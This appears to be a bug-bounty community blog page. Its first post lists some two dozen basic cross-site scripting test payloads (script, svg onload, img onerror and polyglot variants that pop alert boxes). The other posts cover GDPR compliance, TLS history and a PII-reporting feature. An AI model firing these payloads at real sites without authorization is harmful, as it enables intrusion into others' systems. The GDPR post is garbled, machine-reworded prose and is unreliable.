List off basic Cross site script playloads

Posted on by MiguelSantareno 
"><svg/onload=prompt(/OPENBUGBOUNTY/)>
'"--!><img src=x onerror=alert("OPENBUGBOUNTY")> 
'"/><svg/onload=prompt(/OPENBUGBOUNTY/)>
'"><script>alert("OPENBUGBOUNTY")</script>
'"><script>confirm("OPENBUGBOUNTY")</script>
'"><script>prompt("OPENBUGBOUNTY")</script>
'"><svg/onload=alert(/OPENBUGBOUNTY/)>
'"><svg/onload=confirm(/OPENBUGBOUNTY/)>
'"><svg/onload=prompt(/OPENBUGBOUNTY/)>
'>"/><svg/onload=prompt(/OPENBUGBOUNTY/)>
<Img src = x onerror = "javascript: window.onerror = alert; throw XSS">
<img  src="x:gif" onerror="window['al\u0065rt'](0)"></img>
<svg/onload=prompt(/OPENBUGBOUNTY/)>
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert("OPENBUGBOUNTY")//>\x3exss.txt

'"><svg/onload=prompt`1`>
'"><svg/onload=alert`1`>
'"><svg/onload=confirm`1`>
'"><script>alert`1`</script> 
><script>alert`1`</script> 
'"><svg onload=prompt`openbugbounty`>
'"><svg onload=alert`openbugbounty`>
'"><svg onload=confirm`openbugbounty`>
<!'/*!"/*!/'/*/"/*--!><Input/Autofocus/*/Onfocus=confirm`OPENBUGBOUNTY`//><Svg>/
'"><svg/onload=alert(/openbugbounty/)>

Things to Know About the GDPR and Data Security

Posted on by jingoholidays

The new personal information laws
from the EU are swing the headache on you to make sure you’re
being compliant, however we’re here to offer you some pointers. the
final information Protection Regulation focuses on giving voters a
lot of management over their data on the net.
In addition to empowering users to make a decision what happens with
their info, the GDPR additionally includes new rules on however organizations ought
to handle that information. All of this might need some
action on your half — whether or not you’re not primarily
based within the EU. Here’s what you would like to grasp,
and what you’ll do to remain on high of it.

TLS 1.3 Genesis, Mechanism and Working

Posted on by HackerGautam

Genesis

The Journey from SSL to TLS.

SSL stands for Secure Socket Layer which was first developed by
Netscape and remained unreleased because of security flaws in the
protocol; Later its Version 2.0 was launched in Feb 1995 which again had
many security flaws and was forced to revamp and launch Version 3.0 in
1996.

GDPR PII exposure can now be securely reported via Open Bug Bounty

Posted on by Open Bug Bounty

Open Bug Bounty community is growing: we have over 400 [fee free] bug bounty programs running now, and over 300,000 fixed security vulnerabilities. To facilitate further sustainable growth and to help website owners spot accidental exposure of personal data (PII) on their websites in a timely manner,  we implemented a new type of non-intrusive submission – GDPR PII Exposure.

Here is how it works:

  • Researches who find an unprotected document (e.g. PDF, MS Office document, HTML page, etc) with personal data (PII) can now report this to the website owner in a reliable and discreet manner.
  • Website owners will be able to promptly remove or anonymize the data if the published PII is in a potential violation of GDPR requirements.
  • Open Bug Bounty will not process or store any PII, and will only require anonymized sample of data for submission verification purposes.

Please carefully read the guidelines and make sure you will deliver value and support to the website owners when submitting such entries. Website owners are welcome to update their bug bounty programs, as usual and as always at no cost – we remain a free and non-profit project.

Among other upcoming improvements and updates:

  • new badges for the best bloggers – you can share your researcher experience in our blog
  • a free API for bug bounty owners (to quickly fetch vulnerabilities reported on their websites)
  • a possibility to edit unapproved reports for security researchers
  • our website speed tuning by adding new caching system

Thank you for your support and stay tuned!